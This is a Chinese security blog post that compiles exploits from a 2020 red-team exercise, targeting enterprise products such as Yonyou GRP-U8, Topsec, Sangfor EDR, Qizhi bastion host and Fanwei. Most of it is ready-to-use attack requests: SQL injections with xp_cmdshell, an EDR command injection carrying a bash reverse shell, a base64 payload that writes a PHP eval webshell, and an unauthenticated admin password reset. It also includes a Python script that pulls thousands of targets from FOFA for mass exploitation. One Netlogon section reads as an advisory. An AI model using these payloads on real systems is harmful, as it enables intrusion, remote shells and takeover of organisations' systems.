HW2020 – 0day总结

  • A+
所属分类:安全闲碎


0.目录

HW2020 - 0day总结


1.用友GRP-u8 SQL注入

POST /Proxy HTTP/1.1

Accept: Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)

Host: host

Content-Length: 357

Connection: Keep-Alive

Cache-Control: no-cache


cVer=9.8.0&dp=<r9packet< span=""></r9packet<>

version="1">XMLAS_DataRe

questProviderName<data< span=""></data<>

format="text">DataSetProviderDataData

>exec xp_cmdshell 'net

user'


2.天融信TopApp-LB sql注入


POST /acc/clsf/report/datasource.php HTTP/1.1

Host:

Connection: close

Accept: text/javascript, text/html, application/xml, text/xml, */*

X-Prototype-Version: 1.6.0.3

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57

Content-Type: application/x-www-form-urlencoded

Content-Length: 201


t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&[email protected]。。


3.深信服EDR RCE漏洞

POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1

Host: xx.x.x.x

Connection: close

Accept-Encoding: gzip, deflate

Accept: */*

User-Agent: python-requests/2.22.0

Content-Length: 77


{"params": "w=123"'1234123'"|bash -i >& /dev/tcp/ip/port 0>&1"}

HW2020 - 0day总结

#coding:utf-8

import requests,json,sys

import re

import warnings

warnings.filterwarnings("ignore")


qbase64 = "dGl0bGU9IlNBTkdGT1Lnu4jnq6%2Fmo4DmtYvlk43lupTlubPlj7Ai"

email = ""

key = ""

timeout = 5


headers={

    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"

}


def getFofaAssest():

    result = []

    url = "https://fofa.so/api/v1/search/all?email=%s&key=%s&qbase64=%s&page=1&size=10000&fields=host,title" %(email,key,qbase64)

    res = requests.get(url)

    data = json.loads(res.content)

    #print(data['results'])

    for i in data['results']:

        result.append(i)

    return result


def log(data):

    with open('successLog.txt','a+') as f:

        f.write(data+'n')


def poc(u,**attack):

    print("[*] Checking %s"%(u))

    uri = "/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9"

    url = u+uri

    #data={"params":"w=123"'1234123'"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1"}

    if not attack:

        data={"params":"w=123"'1234123'"|echo aaabbbccc00aa"}

    else:

        if attack['flag']:

            data={"params":"w=123"'1234123'"|{}".format(attack['cmd'])}

    try:

        res = requests.post(url,data=json.dumps(data),verify=False,timeout=timeout)

        data = json.loads(res.content)

        if (data["code"] == 0) or (data["code"] == 1116):

            print("[*] %s is vulnerabile !"%(u))

            if attack and (data["code"] == 0):

                for d in data["data"]:

                    print(d)

            else:

                print("[-] May command error!")

        else:

            print("[*] %s may not vulnerabile ! ,code is:%s"%(u,str(data["code"])))

    except Exception as e:

        print("[-] Error %s , %s"%(u,e))


if len(sys.argv)==2:

    re_ = re.compile(r'[a-zA-Z]+://[^s]*[.w+]')

    try :

        res = re_.findall(sys.argv[1])

        poc(res[0])

    except:

        print("[-] Input url error!")

elif len(sys.argv)==3:

    re_ = re.compile(r'[a-zA-Z]+://[^s]*[.w+]')

    try :

        res = re_.findall(sys.argv[1])

        poc(res[0],flag=True,cmd=sys.argv[2])

    except:

        print("[-] Input url error!")

else:

    domain = getFofaAssest()

    for d in domain:

        #print(d[0])

        if ("https://" in d[0]) or ("http://" in d[0]):

            url = d[0]

        else:

            url = "http://"+d[0]

        poc(url)

4.绿盟UTS绕过登录

随便输密码->修改返回包为True->放行->等待第二次拦截包->内含管理员MD5->替换MD5登录

直接请求接口:/webapi/v1/system/accountmanage/account

5.WPS命令执行漏洞(无)

http://zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html

6.齐治堡垒机 rce

POST /shterm/listener/tui_update.php


a=["t';import os;os.popen('whoami')#"]



https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}


7.联软准入漏洞(无)


8.泛微云桥任意文件读取

检测POC

def poc(u):

    print("[*] Checking %s"%(u))

    uri = "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"

    url = u + uri

    try:

        res = requests.get(url,verify=False)

    except:

        print("[-] %s not vulnerabile!"%(u))

        return 

    try:

        data = json.loads(res.content)

        print("[*] %s is vulnerabile!" %(u))

        res = requests.get(u+"/file/fileNoLogin/%s"%(data['id']))

        print(res.text)

    except:

        print("[-] %s not vulnerabile!"%(u))

HW2020 - 0day总结

9.深信服 SSL VPN 远程代码执行漏洞(暂无)


10.Apache DolphinScheduler 远程代码执行漏洞

11.Exchange Server 远程代码执行漏洞

CVE-2020-16875: Exchange Server 远程代码执行漏洞(202009月度漏洞)

ps 版POC:https://srcincite.io/pocs/cve-2020-16875.ps1.txt

py 版POC:https://srcincite.io/pocs/cve-2020-16875.py.txt

12.Apache DolphinScheduler 权限覆盖漏洞[CVE-2020-13922]

它是一个分布式去中心化,易扩展的可视化DAG(有向无环图)工作流任务调度系统。利用漏洞:需要登录权限, [09/12 态势感知]提供一组默认密码。

该漏洞存在于数据源中心未限制添加的jdbc连接参数,从而实现JDBC客户端反序列化。1、登录到面板 -> 数据源中心。

HW2020 - 0day总结

2、jdbc连接参数就是主角,这里没有限制任意类型的连接串参数。

HW2020 - 0day总结

3、将以下数据添加到jdbc连接参数中,就可以直接触发。

HW2020 - 0day总结

POST /dolphinscheduler/datasources/connect HTTP/1.1


type=MYSQL&name=test&note=&host=127.0.0.1&port=3306&database=test&

principal=&userName=root&password=root&connectType=&

other={"detectCustomCollations":true,"autoDeserialize":true}


关于MySQL JDBC客户端反序列化漏洞的相关参考:

https://www.anquanke.com/post/id/203086



13.Netlogon 特权提升漏洞(CVE-2020-1472)

【漏洞通告】Netlogon 特权提升漏洞(CVE-2020-1472)

近日,绿盟科技监测到国外安全人员公开了NetLogon特权提升漏洞(CVE-2020-1472)的详细信息与验证脚本,导致漏洞风险骤然提升。未经身份验证的攻击者通过NetLogon远程协议(MS-NRPC)建立与域控制器连接的 安全通道时,可利用此漏洞获取域管理员访问权限。此漏洞为微软8月补丁更新时披露,CVSS评分为10,影响广泛,请相关用户尽快采取措施进行防护。

受影响版本:

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016  (Server Core installation)

Windows Server 2019

Windows Server 2019  (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)

漏洞检测:

披露此漏洞的Secura已在GitHub上传了验证脚本,相关用户可使用此工具进行检测:

https://github.com/SecuraBV/CVE-2020-1472/

漏洞防护:

1)官方升级

目前微软官方已针对受支持的产品版本发布了修复此漏洞的安全补丁,强烈建议受影响用户尽快安装补丁进行防护,官方下载链接:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

2)其他防护措施

在安装更新补丁后,还可通过部署域控制器 (DC) 强制模式以免受到该漏洞影响:

请参考官方文档进行配置《如何管理与 CVE-2020-1472 相关的 Netlogon 安全通道连接的更改》:

https://support.microsoft.com/zh-cn/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc


其他工具:https://github.com/dirkjanm/CVE-2020-1472

14.coremail 0day - may be rce


15.activemq远程代码执行0day

http://activemq.apache.org/security-advisories.data/CVE-2020-13920-announcement.txt

16.天融信数据防泄漏系统越权修改管理员密码

无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd

接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。

POST /?module=auth_user&action=mod_edit_pwd

Cookie: username=superman;


uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1


17.Wordpress File-manager任意文件上传

参考:https://www.anquanke.com/post/id/216990


相信大家对Wordpress并不陌生;File-manager插件也是相当火爆前段时间爆出任意文件上传漏洞。


成功上传后文件访问路径


/wordpress/wp-content/plugins/wp-file-manager/lib/files/shell.php



发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: